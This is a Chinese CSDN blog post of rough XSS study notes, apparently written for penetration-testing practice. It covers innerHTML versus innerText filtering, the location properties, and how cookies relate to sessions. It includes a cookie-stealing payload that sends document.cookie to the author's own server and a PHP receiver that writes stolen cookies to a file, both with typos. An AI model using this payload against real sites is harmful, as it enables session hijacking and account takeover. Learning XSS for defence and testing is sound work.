xss一些笔记

最新推荐文章于 2024-08-18 18:22:45 发布
最新推荐文章于 2024-08-18 18:22:45 发布
阅读量366 收藏 4
点赞数 2
分类专栏: 渗透学习 文章标签: xss 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/139708213
版权

(乱写的一些笔记)

innerHTML只防script像是img就不会防

innerText都防

上面代码执行避免用户交互

 js也可以用’‘执行

例子 alert’1‘

document.location.hash          // #号后的部分,包括#号
document.location.host          // 域名+端口号
document.location.hostname      // 域名
document.location.href          // 完整URL
document.location.pathname      // 目录部分
document.location.port          // 端口号
document.location.protocol      // 网络协议(http:)
document.location.search        // ?号后的部分

document.location.hash.slice(1)//获取#号后的部分,不包括#号

cookie和session关系  session就是cookie,在你注册一个用户,服务器生成一个session文件,session文件名为一个随机字符串,文件里面存储一些你的信息。服务端会将你的文件名返回给你的客户端,保存在你客户端的cookie,当你二次登陆时浏览器会带着你的cookie进入到服务端,服务器就会在自己的文件中找有没有你cookie名字的文件

xss payload 构造<script>doument.location.href=“自己服务器地址/cookie.php?cookie=”+doument.cookie</script>

接收cookie的脚本cookie.php

<?php

$cookie=$_GET['cookie'];

//将coolie变量传入file.txt中

file_put_contents('file.txt',$cookkie)

?>

板栗妖怪
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【干货】XSS知识总结
hackzkaq的博客
10-27 6686
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
利用location来变形我们的XSS Payload
即刻出发吧
04-06 1747
XSS的时候,有时候有的过滤器很变态,会过滤很多特殊符号和关键词,比如&、(、)、#、'、",特别是&和括号,少了的话payload很难构造出来。 举个例子吧,比如过滤器过滤了array("(",")","&","\\","","'"),而没有过滤双引号,输出点在,xxxx这里,怎么构造一个可以利用的XSS Payload? 过滤代码如下: 所有人肯定都知道,先闭合
如何进行渗透测试XSS跨站攻击检测
网站安全专家
10-08 2281
国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲这个XSS是如何实现以及原理。 XSS全称为Cross Site ing,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的Java代码执行。...
location.href/location.search/location.pathname区别及用法
飞上云端看彩虹
08-06 1814
location.href/location.search/location.pathname区别及用法: &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;location.href/location.search/location.pathname区别...
XSS漏洞笔记
weixin_71982689的博客
07-14 96
存储型:例如你的用户名,如果该处存在存储型XSS,当用户访问到有你用户名数据的网 页,就会触发恶意代码,从而执行攻击。旁白:看到很多帖子说DOM大多数为反射型,意思是大多数是可以像反射型一样利用,还是有极少部分的存储型?:DOM型不会与服务器产生交互,通过修改操控节点树且不与服务器产生交互的称为DOM型,如传入的数据直接通过document.write()输出到html。以上是个人见解,如有问题请留言,虚心求教。XSS分类:反射型,存储型,DOM型。
XSS漏洞学习笔记
qq_40096118的博客
04-21 368
XSS 攻击通常利用了 Web 应用程序中的不安全输入验证或者过滤机制,允许攻击者将恶意脚本注入到网页中,进而影响其他用户的浏览器执行该脚本。这可能导致恶意脚本偷取用户的会话 Cookie、窃取敏感信息、修改页面内容、重定向到恶意网站等危险行为,甚至利用浏览器漏洞实现更深层次的攻击。恶意脚本作为 URL 参数或表单数据的一部分发送到服务器端,服务器端将恶意脚本反射回给用户,用户的浏览器执行了这些脚本。当其他用户访问包含恶意脚本的页面时,恶意脚本会从服务器端加载并执行,造成危害。
XSS靶场——通关笔记
2301_80358831的博客
07-11 1245
通过代码发现,本关卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。先查看源代码,和上一关的不同之处是t_ua处已经有了参数,虽然第四个<input>的t_ua已经有了参数,但是仍然尝试给这四个隐藏的文本框传参,结果发现t_sort成功接收到传的参,但是t_ua还是原来的参数,没有接收到刚才传的参。
XSS学习笔记1
qq_61109509的博客
02-12 866
目录 xss(简介) javascript 插入进去的方式 xss类型 xss闯关小游戏 leval1 leval2 leval3 leval4 leval5 leval6 leval7 leval8 leval9 leval10 xss(简介) xss是跨站脚本攻击的缩写。恶意攻击者往web页面插入javascript代码,当用户浏览该页时,web里面的script就会对用户发起攻击 也就是说在css或html里面嵌入一些恶意的javascript,实现攻击目的 ja
xss靶场笔记
weixin_44664530的博客
03-10 409
1.构造xss直接过 : 2."><script>alert(1)</script>发现对 html 特殊符号进行了实体编码,
xss game挑战笔记.pdf
02-11
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
xss闯关挑战
11-09
闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
安装xss-labs ppt手册
10-22
你可以收集一些常见的Payload,如JavaScript函数调用、事件触发等,并理解它们的工作机制。 3. **参考Write-up**:Write-up是别人完成XSS-Labs挑战后的经验分享,通常会详细列出每个关卡的解决方法。这可以作为初学...
javaweb笔记.pdf
11-29
* XSS:跨站脚本攻击,攻击者通过在Web页面中注入恶意脚本来获取敏感信息。 * CSRF:跨站请求伪造,攻击者通过伪造用户请求来获取敏感信息。 五、JavaWeb开发性能优化 * 什么是性能优化?性能优化是指通过优化Web...
xss靶场详解
网安小菜鸡的博客
08-18 852
somebody=在svg加载完成以后执行我们的xss代码。因为这次使用的是innertext,他会把我们的标签整个识别成一个字符串输出就不能用一开始的。因为他利用innerHTML直接更新somebody参数,所以我们可以利用。是一个构造函数,用于动态创建一个新的函数。用于立即调用刚刚创建的函数。方法将字符串中的所有字母。是一个正则表达式,用于。
XSS-DOM
最新发布
qq_51502737的博客
08-18 752
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。先注释掉过滤代码,此时正常弹窗。
xss.function靶场(hard)
丁航航的博客
08-18 455
目前啥也不输入,直接进入查看。
XSS Game挑战笔记:入门到精通
因此,通过这份笔记,作者分享了自己的学习过程,并提供了一些关键知识点。 笔记分为多个部分,详细介绍了XSS挑战的各个关卡,每个关卡可能涉及到不同的XSS类型和防御措施。首先,XSS可以分为DOM-based XSS(文档...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值